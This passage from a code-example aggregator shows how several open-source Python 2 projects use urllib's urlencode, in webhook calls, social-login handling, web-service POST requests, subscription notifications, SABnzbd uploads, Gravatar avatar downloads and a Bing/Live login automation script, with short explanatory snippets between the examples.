            if not settings.SEND_WEBHOOKS:
                raise Exception("!! Skipping WebHook send, SEND_WEBHOOKS set to False")

            # no url, bail!
            if not webhook_url:
                raise Exception("No webhook_url specified, skipping send")

            # some hosts deny generic user agents, use Temba as our user agent
            if action == 'GET':
                response = requests.get(webhook_url, headers=TEMBA_HEADERS, timeout=10)
            else:
                response = requests.post(webhook_url, data=data, headers=TEMBA_HEADERS, timeout=10)

            response_text = response.text
            body = response.text
            status_code = response.status_code

            if response.status_code == 200 or response.status_code == 201:
                try:
                    response_json = json.loads(response_text)

                    # only update if we got a valid JSON dictionary or list
                    if not isinstance(response_json, dict) and not isinstance(response_json, list):
                        raise ValueError("Response must be a JSON dictionary or list, ignoring response.")

                    run.update_fields(response_json)
                    message = "Webhook called successfully."
                except ValueError as e:
                    message = "Response must be a JSON dictionary, ignoring response."

                webhook_event.status = COMPLETE
            else:
                webhook_event.status = FAILED
                message = "Got non 200 response (%d) from webhook." % response.status_code
                raise Exception("Got non 200 response (%d) from webhook." % response.status_code)

        except Exception as e:
            import traceback
            traceback.print_exc()

            webhook_event.status = FAILED
            message = "Error calling webhook: %s" % unicode(e)

        finally:
            webhook_event.save()

            # make sure our message isn't too long
            if message:
                message = message[:255]

            result = WebHookResult.objects.create(event=webhook_event,
                                                  url=webhook_url,
                                                  status_code=status_code,
                                                  body=body,
                                                  message=message,
                                                  data=urlencode(data, doseq=True),
                                                  created_by=api_user,
                                                  modified_by=api_user)

            # if this is a test contact, add an entry to our action log
            if run.contact.is_test:
                from temba.flows.models import ActionLog
                log_txt = "Triggered <a href='%s' target='_log'>webhook event</a> - %d" % (reverse('api.log_read', args=[webhook_event.pk]), status_code)
                ActionLog.create(run, log_txt, safe=True)

        return result
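
The WebHookResult above stores the payload with urlencode(data, doseq=True), which expands list values into repeated parameters instead of encoding their repr(). A small illustration with made-up values:

from urllib import urlencode

data = {'flow': 7, 'values': ['red', 'blue']}

print urlencode(data)              # e.g. flow=7&values=%5B%27red%27%2C+%27blue%27%5D
print urlencode(data, doseq=True)  # e.g. flow=7&values=red&values=blue (key order may vary)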

Example 25

Project: Authtopus
Source File: api.py
View license
    @SocialLoginMessage.method( request_fields=( 'access_token', 'provider',
                                                 'password',
                                                 'register_new_user',
                                                 'authtopus_access_token', ),
                                path='social_login',
                                http_method='POST',
                                name='social_login' )
    def SocialLogin( self, slm ):
        if slm.provider is None or slm.access_token is None:
            raise BadRequestException( 'No provider or access token given' )
        # Fetch the user info
        social_id = None
        url = PROVIDER_URLS.get( slm.provider.lower( ) )
        if url is None:
            raise BadRequestException( 'Unknown provider' )
        url = url.format( urlencode( { 'access_token': slm.access_token } ) )
        try:
            result = urlfetch.fetch( url )
        except urlfetch.Error:
            raise InternalServerErrorException(
                'Failed to login with {p}. Please try again later.'.format(
                    p=slm.provider )
            )
        if result.status_code == 200:
            body = json.loads( result.content )
            social_id = body.get( 'id' )
            # Determine if email provided, if any, is verified
            if slm.provider.lower( ) == 'facebook':
                # Can assume Facebook emails are verified:
                # http://stackoverflow.com/questions/14280535
                # /is-it-possible-to-check-if-an-email-is-confirmed-on-facebook
                verified = True
            elif slm.provider.lower( ) == 'google':
                verified = body.get( 'verified_email' )
            else:
                logging.error( 'Unexpected provider: ' + slm.provider )
                raise BadRequestException( 'Unknown provider' )
            # Grab the social email and create a username based on the email
            # with most non-alphanumeric characters removed
            social_email = body.get( 'email' )
            username = None
            if social_email:
                username = social_email.split( '@' )[ 0 ]
                username = re.sub( '[^a-zA-Z0-9_-]+', '', username )
                if len( username ) > 17:
                    username = username[ :17 ]
            if not username:
                username = 'dummy'
            if not verified:
                # Don't actually use the social email if it is not verified
                social_email = None

        if social_id:
            # Need to fetch the user id associated with this social id
            # + email, or create a new user if one does not yet exist

            # Check if a user with this social id already exists
            auth_id = '{0}:{1}'.format( slm.provider.lower( ), social_id )
            slm.user = User.get_by_auth_id( auth_id )
            if slm.user is None:
                # Social id not in use. Try getting user by verified email
                # to see if we can add social login with an existing user
                if social_email is not None:
                    slm.user = User.get_by_email_verified( social_email )
                if slm.user is None:
                    # Email not in use either
                    if not slm.register_new_user:
                        msg = 'Failed to find registered user'
                        if social_email is not None:
                            msg += ' with verified email [' + social_email + ']'
                        msg += '. Have you registered yet?'
                        raise BadRequestException( msg )
                    elif( config.USE_ACCESS_TOKENS
                          and not User.validate_access_token(
                              slm.authtopus_access_token ) ):
                        raise BadRequestException( 'Invalid access token' )

                    # Create a new user.

                    # Try creating a new user by varying the username
                    for num in range( 1000 ):
                        suffix = ''
                        if num > 0:
                            suffix = str( num )
                        this_username = username + suffix
                        unique_properties = [ 'username' ]
                        if social_email is not None:
                            unique_properties.append( 'email_verified' )
                            
                        ok, info = User.create_user(
                            auth_id,
                            unique_properties=unique_properties,
                            email_verified=social_email,
                            email_pending=social_email,
                            username=this_username,
                            is_mod=False )
                        if ok:
                            slm.user = info
                            if config.USE_ACCESS_TOKENS:
                                User.delete_access_token(
                                    slm.authtopus_access_token )
                            custom.user_created( slm.user )
                            break
                        elif( 'email' in info
                              and social_email is not None ):
                            # Looks like the social email is in use after all.
                            # This could happen, for instance, if a user tried
                            # to double register at the same time.
                            raise ConflictException(
                                'Email [' + social_email + '] for this account'
                                + ' is already in use. '
                                + 'Did you accidentally try to login twice, '
                                + 'or have you not verified your email address'
                                + ' yet?')
                    else:
                        # Failed to create an account after 1000 tries
                        raise ConflictException(
                            'Encountered conflict when creating new account.' )
                else:
                    # Email is in use, but social_id is not.
                    # If the User has a password, we require it before
                    # adding the social auth id to the User
                    if slm.user.has_password:
                        if not slm.password:
                            # Need a password, but none provided
                            slm.password_required = True
                            return slm
                        if not slm.user.check_password( slm.password ):
                            # Need a password, but provided password invalid
                            raise UnauthorizedException(
                                'Invalid credentials' )

                    # Now add the social auth id
                    ok, info = slm.user.add_auth_id( auth_id )
                    if ok:
                        slm.user = info
                    else:
                        raise ConflictException(
                            'Encountered conflict when adding auth id to '
                            + 'existing account, conflicting properties: '
                            + str( info ) )

            if( social_email
                and slm.user.email_pending_lower == social_email.lower( )
                and slm.user.email_verified_lower != social_email.lower( ) ):
                # Email is now verified by social login
                slm.user = self.validate_email_internal( slm.user )
                
            # Create auth token
            slm.user_id_auth_token = self.create_user_id_auth_token(
                slm.user.get_id( ) )
            if slm.user_id_auth_token is None:
                raise ConflictException(
                    'Encountered conflict when creating auth token' )
        else:
            raise BadRequestException(
                'Access token did not provide valid id' )

        return slm
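
The provider lookup above builds its request URL by formatting an encoded access_token fragment into a URL template. A minimal sketch; the template and token below are placeholders, not the real provider endpoints:

from urllib import urlencode

PROVIDER_URL = 'https://graph.example.com/me?fields=id,email&{0}'
token = 'ya29.EXAMPLE/TOKEN+=='

url = PROVIDER_URL.format(urlencode({'access_token': token}))
# -> https://graph.example.com/me?fields=id,email&access_token=ya29.EXAMPLE%2FTOKEN%2B%3D%3D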

Example 26

Project: entropy
Source File: client.py
View license
    def _generic_post_handler(self, function_name, params, file_params,
        timeout):
        """
        Given a function name and the request data (dict format), do the actual
        HTTP request and return the response object to caller.
        WARNING: params and file_params dict keys must be ASCII string only.

        @param function_name: name of the function that called this method
        @type function_name: string
        @param params: POST parameters
        @type params: dict
        @param file_params: mapping composed by file names as key and tuple
            composed by (file_name, file object) as values
        @type file_params: dict
        @param timeout: socket timeout
        @type timeout: float
        @return: tuple composed by the server response string or None
            (in case of empty response) and the HTTPResponse object (useful
                for checking response status)
        @rtype: tuple
        """
        if timeout is None:
            timeout = self._default_timeout_secs
        multipart_boundary = "---entropy.services,boundary---"
        request_path = self._request_path.rstrip("/") + "/" + function_name
        const_debug_write(__name__,
            "WebService _generic_post_handler, calling: %s at %s -- %s,"
            " tx_callback: %s, timeout: %s" % (self._request_host, request_path,
                params, self._transfer_callback, timeout,))
        connection = None
        try:
            if self._request_protocol == "http":
                connection = httplib.HTTPConnection(self._request_host,
                    timeout = timeout)
            elif self._request_protocol == "https":
                ssl_context = None
                if hasattr(ssl, 'create_default_context'):
                    ssl_context = ssl.create_default_context(
                        purpose = ssl.Purpose.CLIENT_AUTH)
                connection = httplib.HTTPSConnection(
                    self._request_host, timeout = timeout, context = ssl_context)
            else:
                raise WebService.RequestError("invalid request protocol",
                    method = function_name)

            headers = {
                "Accept": "text/plain",
                "User-Agent": self._generate_user_agent(function_name),
            }

            if file_params is None:
                file_params = {}
            # autodetect file parameters in params
            for k in list(params.keys()):
                if isinstance(params[k], (tuple, list)) \
                    and (len(params[k]) == 2):
                    f_name, f_obj = params[k]
                    if isinstance(f_obj, file):
                        file_params[k] = params[k]
                        del params[k]
                elif const_isunicode(params[k]):
                    # convert to raw string
                    params[k] = const_convert_to_rawstring(params[k],
                        from_enctype = "utf-8")
                elif not const_isstring(params[k]):
                    # invalid ?
                    if params[k] is None:
                        # will be converted to ""
                        continue
                    int_types = const_get_int()
                    supported_types = (float, list, tuple) + int_types
                    if not isinstance(params[k], supported_types):
                        raise WebService.UnsupportedParameters(
                            "%s is unsupported type %s" % (k, type(params[k])))
                    list_types = (list, tuple)
                    if isinstance(params[k], list_types):
                        # not supporting nested lists
                        non_str = [x for x in params[k] if not \
                            const_isstring(x)]
                        if non_str:
                            raise WebService.UnsupportedParameters(
                                "%s is unsupported type %s" % (k,
                                    type(params[k])))

            body = None
            if not file_params:
                headers["Content-Type"] = "application/x-www-form-urlencoded"
                encoded_params = urllib_parse.urlencode(params)
                data_size = len(encoded_params)
                if self._transfer_callback is not None:
                    self._transfer_callback(0, data_size, False)

                if data_size < 65536:
                    try:
                        connection.request("POST", request_path, encoded_params,
                            headers)
                    except socket.error as err:
                        raise WebService.RequestError(err,
                            method = function_name)
                else:
                    try:
                        connection.request("POST", request_path, None, headers)
                    except socket.error as err:
                        raise WebService.RequestError(err,
                            method = function_name)
                    sio = StringIO(encoded_params)
                    data_size = len(encoded_params)
                    while True:
                        chunk = sio.read(65535)
                        if not chunk:
                            break
                        try:
                            connection.send(chunk)
                        except socket.error as err:
                            raise WebService.RequestError(err,
                                method = function_name)
                        if self._transfer_callback is not None:
                            self._transfer_callback(sio.tell(),
                                data_size, False)
                # for both ways, send a signal through the callback
                if self._transfer_callback is not None:
                    self._transfer_callback(data_size, data_size, False)

            else:
                headers["Content-Type"] = "multipart/form-data; boundary=" + \
                    multipart_boundary
                body_file, body_fpath = self._encode_multipart_form(params,
                    file_params, multipart_boundary)
                try:
                    data_size = body_file.tell()
                    headers["Content-Length"] = str(data_size)
                    body_file.seek(0)
                    if self._transfer_callback is not None:
                        self._transfer_callback(0, data_size, False)

                    try:
                        connection.request("POST", request_path, None, headers)
                    except socket.error as err:
                        raise WebService.RequestError(err,
                            method = function_name)
                    while True:
                        chunk = body_file.read(65535)
                        if not chunk:
                            break
                        try:
                            connection.send(chunk)
                        except socket.error as err:
                            raise WebService.RequestError(err,
                                method = function_name)
                        if self._transfer_callback is not None:
                            self._transfer_callback(body_file.tell(),
                                data_size, False)
                    if self._transfer_callback is not None:
                        self._transfer_callback(data_size, data_size, False)
                finally:
                    body_file.close()
                    os.remove(body_fpath)

            try:
                response = connection.getresponse()
            except socket.error as err:
                raise WebService.RequestError(err,
                    method = function_name)
            const_debug_write(__name__, "WebService.%s(%s), "
                "response header: %s" % (
                    function_name, params, response.getheaders(),))
            total_length = response.getheader("Content-Length", "-1")
            try:
                total_length = int(total_length)
            except ValueError:
                total_length = -1
            outcome = const_convert_to_rawstring("")
            current_len = 0
            if self._transfer_callback is not None:
                self._transfer_callback(current_len, total_length, True)
            while True:
                try:
                    chunk = response.read(65536)
                except socket.error as err:
                    raise WebService.RequestError(err,
                        method = function_name)
                if not chunk:
                    break
                outcome += chunk
                current_len += len(chunk)
                if self._transfer_callback is not None:
                    self._transfer_callback(current_len, total_length, True)

            if self._transfer_callback is not None:
                self._transfer_callback(total_length, total_length, True)

            if const_is_python3():
                outcome = const_convert_to_unicode(outcome)
            if not outcome:
                return None, response
            return outcome, response

        except httplib.HTTPException as err:
            raise WebService.RequestError(err,
                method = function_name)
        finally:
            if connection is not None:
                connection.close()
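
A minimal sketch of the non-multipart branch above, assuming Python 2 (urllib, httplib) and a hypothetical host and path; the key step is urllib.urlencode() producing the application/x-www-form-urlencoded POST body:

import httplib
import urllib

# encode the parameters into a form-urlencoded POST body
params = urllib.urlencode({"package": "app-foo/bar", "arch": "amd64"})
headers = {"Content-Type": "application/x-www-form-urlencoded",
           "Accept": "text/plain"}
connection = httplib.HTTPConnection("example.com", timeout=5)
connection.request("POST", "/service/get_data", params, headers)
response = connection.getresponse()
print response.status
connection.close()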

Example 27

Project: eden
Source File: s3notify.py
View license
    @classmethod
    def notify(cls, resource_id):
        """
            Asynchronous task to notify a subscriber about updates;
            runs a POST ?format=msg request against the subscribed
            controller, which extracts the data, renders the
            notification message and sends it (see send()).

            @param resource_id: the pr_subscription_resource record ID
        """

        _debug("S3Notifications.notify(resource_id=%s)", resource_id)

        db = current.db
        s3db = current.s3db

        stable = s3db.pr_subscription
        rtable = db.pr_subscription_resource
        ftable = s3db.pr_filter

        # Extract the subscription data
        join = stable.on(rtable.subscription_id == stable.id)
        left = ftable.on(ftable.id == stable.filter_id)

        # @todo: should not need rtable.resource here
        row = db(rtable.id == resource_id).select(stable.id,
                                                  stable.pe_id,
                                                  stable.frequency,
                                                  stable.notify_on,
                                                  stable.method,
                                                  stable.email_format,
                                                  rtable.id,
                                                  rtable.resource,
                                                  rtable.url,
                                                  rtable.last_check_time,
                                                  ftable.query,
                                                  join=join,
                                                  left=left).first()
        if not row:
            return True

        s = getattr(row, "pr_subscription")
        r = getattr(row, "pr_subscription_resource")
        f = getattr(row, "pr_filter")

        # Create a temporary token to authorize the lookup request
        auth_token = str(uuid4())

        # Store the auth_token in the subscription record
        r.update_record(auth_token=auth_token)
        db.commit()

        # Construct the send-URL
        settings = current.deployment_settings
        public_url = settings.get_base_public_url()
        lookup_url = "%s/%s/%s" % (public_url,
                                   current.request.application,
                                   r.url.lstrip("/"))

        # Break up the URL into its components
        purl = list(urlparse.urlparse(lookup_url))

        # Subscription parameters
        last_check_time = s3_encode_iso_datetime(r.last_check_time)
        query = {"subscription": auth_token, "format": "msg"}
        if "upd" in s.notify_on:
            query["~.modified_on__ge"] = last_check_time
        else:
            query["~.created_on__ge"] = last_check_time

        # Filters
        if f.query:
            from s3filter import S3FilterString
            resource = s3db.resource(r.resource)
            fstring = S3FilterString(resource, f.query)
            for k, v in fstring.get_vars.iteritems():
                if v is not None:
                    if k in query:
                        value = query[k]
                        if type(value) is list:
                            value.append(v)
                        else:
                            query[k] = [value, v]
                    else:
                        query[k] = v
            query_nice = s3_unicode(fstring.represent())
        else:
            query_nice = None

        # Add subscription parameters and filters to the URL query, and
        # put the URL back together
        query = urlencode(query)
        if purl[4]:
            query = "&".join((purl[4], query))
        page_url = urlparse.urlunparse([purl[0], # scheme
                                        purl[1], # netloc
                                        purl[2], # path
                                        purl[3], # params
                                        query,   # query
                                        purl[5], # fragment
                                        ])

        # Serialize data for send (avoid second lookup in send)
        data = json.dumps({"pe_id": s.pe_id,
                           "notify_on": s.notify_on,
                           "method": s.method,
                           "email_format": s.email_format,
                           "resource": r.resource,
                           "last_check_time": last_check_time,
                           "filter_query": query_nice,
                           "page_url": lookup_url,
                           "item_url": None,
                           })

        # Send the request
        _debug("Requesting %s", page_url)
        req = urllib2.Request(page_url, data=data)
        req.add_header("Content-Type", "application/json")
        success = False
        try:
            response = json.loads(urllib2.urlopen(req).read())
            message = response["message"]
            if response["status"] == "success":
                success = True
        except urllib2.HTTPError, e:
            message = ("HTTP %s: %s" % (e.code, e.read()))
        except:
            exc_info = sys.exc_info()[:2]
            message = ("%s: %s" % (exc_info[0].__name__, exc_info[1]))
        _debug(message)

        # Update time stamps and unlock, invalidate auth token
        intervals = s3db.pr_subscription_check_intervals
        interval = datetime.timedelta(minutes=intervals.get(s.frequency, 0))
        if success:
            last_check_time = datetime.datetime.utcnow()
            next_check_time = last_check_time + interval
            r.update_record(auth_token=None,
                            locked=False,
                            last_check_time=last_check_time,
                            next_check_time=next_check_time)
        else:
            r.update_record(auth_token=None,
                            locked=False)
        db.commit()

        # Done
        return message
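
A minimal sketch of the query-building step above, assuming Python 2 (urlparse, urllib) and a hypothetical lookup URL and token; urllib.urlencode() turns the subscription parameters into a query string that is merged back into the parsed URL:

import urllib
import urlparse

lookup_url = "http://example.com/eden/pr/person?existing=1"
query = {"subscription": "dummy-token", "format": "msg",
         "~.modified_on__ge": "2016-01-01T00:00:00"}

# merge the encoded parameters into the existing query component
purl = list(urlparse.urlparse(lookup_url))
encoded = urllib.urlencode(query)
purl[4] = "&".join((purl[4], encoded)) if purl[4] else encoded
print urlparse.urlunparse(purl)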

Example 28

Project: NOT_UPDATED_Sick-Beard-Dutch
Source File: sab.py
View license
def sendNZB(nzb):
    """
    Sends an NZB to SABnzbd via the API.
    
    nzb: The NZBSearchResult object to send to SAB
    """

    # set up a dict with the URL params in it
    params = {}
    if sickbeard.SAB_USERNAME != None:
        params['ma_username'] = sickbeard.SAB_USERNAME
    if sickbeard.SAB_PASSWORD != None:
        params['ma_password'] = sickbeard.SAB_PASSWORD
    if sickbeard.SAB_APIKEY != None:
        params['apikey'] = sickbeard.SAB_APIKEY
    if sickbeard.SAB_CATEGORY != None:
        params['cat'] = sickbeard.SAB_CATEGORY

    # use high priority if specified (recently aired episode)
    if nzb.priority == 1:
        params['priority'] = 1

    # if it's a normal result we just pass SAB the URL
    if nzb.resultType == "nzb":
        # for newzbin results send the ID to sab specifically
        if nzb.provider.getID() == 'newzbin':
            id = nzb.provider.getIDFromURL(nzb.url)
            if not id:
                logger.log("Unable to send NZB to sab, can't find ID in URL " + str(nzb.url), logger.ERROR)
                return False
            params['mode'] = 'addid'
            params['name'] = id
        else:
            params['mode'] = 'addurl'
            params['name'] = nzb.url

    # if we get a raw data result we want to upload it to SAB
    elif nzb.resultType == "nzbdata":
        params['mode'] = 'addfile'
        multiPartParams = {"nzbfile": (nzb.name + ".nzb", nzb.extraInfo[0])}

    url = sickbeard.SAB_HOST + "api?" + urllib.urlencode(params)

    logger.log(u"Sending NZB to SABnzbd")
    logger.log(u"URL: " + url, logger.DEBUG)

    try:
        # if we have the URL to an NZB then we've built up the SAB API URL already so just call it 
        if nzb.resultType == "nzb":
            f = urllib.urlopen(url)
        
        # if we are uploading the NZB data to SAB then we need to build a little POST form and send it
        elif nzb.resultType == "nzbdata":
            cookies = cookielib.CookieJar()
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
                                          MultipartPostHandler.MultipartPostHandler)
            req = urllib2.Request(url,
                                  multiPartParams,
                                  headers={'User-Agent': USER_AGENT})

            f = opener.open(req)

    except (EOFError, IOError), e:
        logger.log(u"Unable to connect to SAB: " + ex(e), logger.ERROR)
        return False

    except httplib.InvalidURL, e:
        logger.log(u"Invalid SAB host, check your config: " + ex(e), logger.ERROR)
        return False

    # this means we couldn't open the connection or something just as bad
    if f == None:
        logger.log(u"No data returned from SABnzbd, NZB not sent", logger.ERROR)
        return False

    # if we opened the URL connection then read the result from SAB
    try:
        result = f.readlines()
    except Exception, e:
        logger.log(u"Error trying to get result from SAB, NZB not sent: " + ex(e), logger.ERROR)
        return False

    # SAB shouldn't return a blank result, this most likely (but not always) means that it timed out and didn't receive the NZB
    if len(result) == 0:
        logger.log(u"No data returned from SABnzbd, NZB not sent", logger.ERROR)
        return False

    # massage the result a little bit
    sabText = result[0].strip()

    logger.log(u"Result text from SAB: " + sabText, logger.DEBUG)

    # do some crude parsing of the result text to determine what SAB said
    if sabText == "ok":
        logger.log(u"NZB sent to SAB successfully", logger.DEBUG)
        return True
    elif sabText == "Missing authentication":
        logger.log(u"Incorrect username/password sent to SAB, NZB not sent", logger.ERROR)
        return False
    else:
        logger.log(u"Unknown failure sending NZB to sab. Return text is: " + sabText, logger.ERROR)
        return False
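
A minimal sketch of the SABnzbd API URL built above, assuming Python 2 and placeholder host and credentials (not the original project's configuration); urllib.urlencode() assembles the query string appended to "api?":

import urllib

params = {"mode": "addurl",
          "name": "http://example.com/release.nzb",
          "ma_username": "user",
          "ma_password": "pass",
          "apikey": "0123456789abcdef",
          "cat": "tv"}
url = "http://localhost:8080/sabnzbd/api?" + urllib.urlencode(params)
print url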

Example 29

Project: pybossa
Source File: cli.py
View license
def bootstrap_avatars():
    """Download current links from user avatar and projects to real images hosted in the
    PyBossa server."""
    import requests
    import os
    import time
    from urlparse import urlparse
    from PIL import Image

    def get_gravatar_url(email, size):
        # import code for encoding urls and generating md5 hashes
        import urllib, hashlib

        # construct the url
        gravatar_url = "http://www.gravatar.com/avatar/" + hashlib.md5(email.lower()).hexdigest() + "?"
        gravatar_url += urllib.urlencode({'d':404, 's':str(size)})
        return gravatar_url

    with app.app_context():
        if app.config['UPLOAD_METHOD'] == 'local':
            users = User.query.order_by('id').all()
            print "Downloading avatars for %s users" % len(users)
            for u in users:
                print "Downloading avatar for %s ..." % u.name
                container = "user_%s" % u.id
                path = os.path.join(app.config.get('UPLOAD_FOLDER'), container)
                try:
                    print get_gravatar_url(u.email_addr, 100)
                    r = requests.get(get_gravatar_url(u.email_addr, 100), stream=True)
                    if r.status_code == 200:
                        if not os.path.isdir(path):
                            os.makedirs(path)
                        prefix = time.time()
                        filename = "%s_avatar.png" % prefix
                        with open(os.path.join(path, filename), 'wb') as f:
                            for chunk in r.iter_content(1024):
                                f.write(chunk)
                        u.info['avatar'] = filename
                        u.info['container'] = container
                        db.session.commit()
                        print "Done!"
                    else:
                        print "No Gravatar, this user will use the placeholder."
                except:
                    raise
                    print "No gravatar, this user will use the placehoder."


            apps = Project.query.all()
            print "Downloading avatars for %s projects" % len(apps)
            for a in apps:
                if a.info.get('thumbnail') and not a.info.get('container'):
                    print "Working on project: %s ..." % a.short_name
                    print "Saving avatar: %s ..." % a.info.get('thumbnail')
                    url = urlparse(a.info.get('thumbnail'))
                    if url.scheme and url.netloc:
                        container = "user_%s" % a.owner_id
                        path = os.path.join(app.config.get('UPLOAD_FOLDER'), container)
                        try:
                            r = requests.get(a.info.get('thumbnail'), stream=True)
                            if r.status_code == 200:
                                prefix = time.time()
                                filename = "app_%s_thumbnail_%i.png" % (a.id, prefix)
                                if not os.path.isdir(path):
                                    os.makedirs(path)
                                with open(os.path.join(path, filename), 'wb') as f:
                                    for chunk in r.iter_content(1024):
                                        f.write(chunk)
                                a.info['thumbnail'] = filename
                                a.info['container'] = container
                                db.session.commit()
                                print "Done!"
                        except:
                            print "Something failed, this project will use the placehoder."
        if app.config['UPLOAD_METHOD'] == 'rackspace':
            import pyrax
            import tempfile
            pyrax.set_setting("identity_type", "rackspace")
            pyrax.set_credentials(username=app.config['RACKSPACE_USERNAME'],
                                  api_key=app.config['RACKSPACE_API_KEY'],
                                  region=app.config['RACKSPACE_REGION'])

            cf = pyrax.cloudfiles
            users = User.query.all()
            print "Downloading avatars for %s users" % len(users)
            dirpath = tempfile.mkdtemp()
            for u in users:
                try:
                    r = requests.get(get_gravatar_url(u.email_addr, 100), stream=True)
                    if r.status_code == 200:
                        print "Downloading avatar for %s ..." % u.name
                        container = "user_%s" % u.id
                        try:
                            cf.get_container(container)
                        except pyrax.exceptions.NoSuchContainer:
                            cf.create_container(container)
                            cf.make_container_public(container)
                        prefix = time.time()
                        filename = "%s_avatar.png" % prefix
                        with open(os.path.join(dirpath, filename), 'wb') as f:
                            for chunk in r.iter_content(1024):
                                f.write(chunk)
                        chksum = pyrax.utils.get_checksum(os.path.join(dirpath,
                                                                       filename))
                        cf.upload_file(container,
                                       os.path.join(dirpath, filename),
                                       obj_name=filename,
                                       etag=chksum)
                        u.info['avatar'] = filename
                        u.info['container'] = container
                        db.session.commit()
                        print "Done!"
                    else:
                        print "No Gravatar, this user will use the placeholder."
                except:
                    print "No gravatar, this user will use the placehoder."


            apps = Project.query.all()
            print "Downloading avatars for %s projects" % len(apps)
            for a in apps:
                if a.info.get('thumbnail') and not a.info.get('container'):
                    print "Working on project: %s ..." % a.short_name
                    print "Saving avatar: %s ..." % a.info.get('thumbnail')
                    url = urlparse(a.info.get('thumbnail'))
                    if url.scheme and url.netloc:
                        container = "user_%s" % a.owner_id
                        try:
                            cf.get_container(container)
                        except pyrax.exceptions.NoSuchContainer:
                            cf.create_container(container)
                            cf.make_container_public(container)

                        try:
                            r = requests.get(a.info.get('thumbnail'), stream=True)
                            if r.status_code == 200:
                                prefix = time.time()
                                filename = "app_%s_thumbnail_%i.png" % (a.id, prefix)
                                with open(os.path.join(dirpath, filename), 'wb') as f:
                                    for chunk in r.iter_content(1024):
                                        f.write(chunk)
                                chksum = pyrax.utils.get_checksum(os.path.join(dirpath,
                                                                               filename))
                                cf.upload_file(container,
                                               os.path.join(dirpath, filename),
                                               obj_name=filename,
                                               etag=chksum)
                                a.info['thumbnail'] = filename
                                a.info['container'] = container
                                db.session.commit()
                                print "Done!"
                        except:
                            print "Something failed, this project will use the placehoder."

Example 30

Project: BingRewards
Source File: bingAuth.py
View license
    def __authenticateLive(self, login, password):
        """
        Authenticates a user on bing.com with his/her Live account.

        throws AuthenticationError if authentication can not be passed
        throws urllib2.HTTPError if the server couldn't fulfill the request
        throws urllib2.URLError if failed to reach the server
        """
#        print "Requesting bing.com"

# request http://www.bing.com
        request = urllib2.Request(url = bingCommon.BING_URL, headers = self.httpHeaders)
        with self.opener.open(request) as response:
            page = helpers.getResponseBody(response)

# get connection URL for provider Live
        s = page.index('"WindowsLiveId":"')
        s += len('"WindowsLiveId":"')
        e = page.index('"', s)

        url = BingAuth._escapeString(page[s:e])

        request = urllib2.Request(url = url, headers = self.httpHeaders)
        request.add_header("Referer", bingCommon.BING_URL)
        with self.opener.open(request) as response:
            referer = response.geturl()
# get Live authentication form action url
            page = helpers.getResponseBody(response)

# get PPFT parameter
        s = page.index("sFTTag")
        s = page.index('value="', s)
        s += len('value="')
        e = page.index('"', s)
        PPFT = page[s:e]

# get PPSX parameter
        ppsxSearch = self.ppsxValue.search(page)
        if ppsxSearch == None:
            raise AuthenticationError("Could not find variable 't' on Live login page")
        PPSX = ppsxSearch.group(1)

# generate ClientLoginTime
        clt = 20000 + int(random.uniform(0, 1000))

# get url to post data to
        s = page.index(",urlPost:'")
        s += len(",urlPost:'")
        e = page.index("'", s)
        url = page[s:e]

        timestamp = int(round(time.time() * 1000))
        # TODO: randomize times a bit?
        i16 = json.dumps({
            "navigationStart": timestamp,
            "unloadEventStart": timestamp + 209,
            "unloadEventEnd": timestamp + 210,
            "redirectStart": 0,
            "redirectEnd": 0,
            "fetchStart": timestamp + 73,
            "domainLookupStart": timestamp + 73,
            "domainLookupEnd": timestamp + 130,
            "connectStart": timestamp + 130,
            "connectEnd": timestamp + 130,
            "secureConnectionStart": timestamp + 210,
            "requestStart": timestamp + 183,
            "responseStart": timestamp + 205,
            "responseEnd": timestamp + 205,
            "domLoading": timestamp + 208,
            "domInteractive": timestamp + 406,
            "domContentLoadedEventStart": timestamp + 420,
            "domContentLoadedEventEnd": timestamp + 420,
            "domComplete": timestamp + 422,
            "loadEventStart": timestamp + 422,
            "loadEventEnd": 0
        })

        postFields = urllib.urlencode({
            "loginfmt"      : login,
            "login"         : login,
            "passwd"        : password,
            "type"          : "11",
            "PPFT"          : PPFT,
            "PPSX"          : str(PPSX),
            "LoginOptions"  : "3",
            "FoundMSAs"     : "",
            "fspost"        : "0",
            "NewUser"       : "1",
            "i2"            : "1",                  # ClientMode
            "i13"           : "0",                  # ClientUsedKMSI
            "i16"           : i16,
            "i19"           : str(clt),             # ClientLoginTime
            "i21"           : "0",
            "i22"           : "0",
            "i17"           : "0",                  # SRSFailed
            "i18"           : "__DefaultLogin_Strings|1,__DefaultLogin_Core|1," # SRSSuccess
        })

        # get Passport page

        request = urllib2.Request(url, postFields, self.httpHeaders)
        request.add_header("Referer", referer)
        with self.opener.open(request) as response:
            referer = response.geturl()
            page = helpers.getResponseBody(response)

        # Checking for bad usernames and password
        helpers.errorOnText(page, 'That password is incorrect.', 'Authentication has not been passed: Invalid password')
        helpers.errorOnText(page, "That Microsoft account doesn\\'t exist", 'Authentication has not been passed: Invalid username')
        # check if there is a new terms of use
        helpers.errorOnText(page, '//account.live.com/tou/accrue', 'Please log in (log out first if necessary) through a browser and accept the Terms Of Use')

        contSubmitUrl = self.formAction.search(page)
        if contSubmitUrl == None:
            raise AuthenticationError("Could not find form action for continue page")
        url = contSubmitUrl.group(1)

        # get all form inputs
        formFields = self.inputNameValue.findall(page)
        postFields = {}
        for field in formFields:
            postFields[field[0]] = field[1]
        postFields = urllib.urlencode(postFields)

        # submit continue page
        request = urllib2.Request(url, postFields, self.httpHeaders)
        request.add_header("Referer", referer)
        with self.opener.open(request) as response:
            referer = response.geturl()
            page = helpers.getResponseBody(response)

        request = urllib2.Request(url = bingCommon.BING_URL, headers = self.httpHeaders)
        request.add_header("Referer", referer)
        with self.opener.open(request) as response:
            referer = response.geturl()

# if that's not bingCommon.BING_URL => authentication didn't pass => write the page to a file and report
            if referer.find(bingCommon.BING_URL) == -1:
                try:
                    filename = helpers.dumpErrorPage(helpers.getResponseBody(response))
                    s = "check " + filename + " file for more information"
                except IOError:
                    s = "no further information could be provided - failed to write a file into " + \
                        helpers.RESULTS_DIR + " subfolder"
                raise AuthenticationError("Authentication has not been passed:\n" + s)

Example 31

Project: ShaniXBMCWork2
Source File: default.py
View license
def PlayLiveLink ( url ): 


	progress = xbmcgui.DialogProgress()
	progress.create('Progress', 'Fetching Streaming Info')
	progress.update( 10, "", "Finding links..", "" )

	if mode==7:
		req = urllib2.Request(url)
